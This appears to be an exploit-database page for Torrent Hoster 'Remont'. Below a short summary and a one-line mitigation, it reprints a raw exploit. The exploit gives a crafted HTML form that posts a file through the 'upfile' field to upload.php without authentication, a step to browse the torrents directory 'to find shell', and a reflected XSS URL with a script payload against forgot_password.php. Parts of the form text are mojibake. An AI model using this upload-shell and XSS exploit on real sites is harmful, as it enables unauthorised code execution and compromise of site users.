header-logo
Suggest Exploit
vendor:
Remont
by:
El-Kahina
8,8
CVSS
HIGH
Upload
434
CWE
Product Name: Remont
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)
2020

Torrent Hoster Remont Upload Exploit

An attacker can exploit a vulnerability in Torrent Hoster Remont to upload malicious files. The vulnerability exists in the 'upload.php' file, which allows an attacker to upload a malicious file without any authentication. The malicious file can be uploaded by using the 'upfile' parameter in the 'upload.php' file. The malicious file can then be accessed by visiting the 'torrents' directory. Additionally, an attacker can also exploit an XSS vulnerability in the 'forgot_password.php' file to execute malicious JavaScript code.

Mitigation:

The application should validate the file type before allowing the file to be uploaded. Additionally, the application should also validate the input parameters to prevent XSS attacks.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Torrent Hoster Remont Upload Exploit           
| # Author   : El-Kahina                                                                                                                
| # Home     : www.h4kz.com                                                                              |                                                                                                                               
| # Script   : Powered by Torrent Hoster.     
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       
| # Bug      : Upload    
|                                                                  
======================      Exploit By El-Kahina       =================================
 # Exploit  : 
 
 1 - use tamper data :
 
 http://127.0.0.1/torrenthoster//torrents.php?mode=upload
 
 2- 
    <center>
   Powered by Torrent Hoster
        <br />
        <form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
        <strong>&#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533; &#65533;&#65533; &#65533;&#65533;:</strong> <?php echo $maxfilesize; ?>&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;<br />
<br>
        <input type="file" name="upfile" size="50" /><br />
<input type="submit" value="&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;" id="upload" />
        </form>
        <div id="part2" style="display: none;">&#65533;&#65533;&#65533; &#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533; .. &#65533;&#65533; &#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;</div>
        </center>
        
3 - http://127.0.0.1/torrenthoster/torrents/  (to find shell)      
        
4 - Xss:

http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt>
       
==========================================
Greetz : Exploit-db Team 
all my friend :(Dz-Ghost Team ) 
im indoushka's sister
------------------------------------------

Navigation

Suggest Exploit

Services By CQR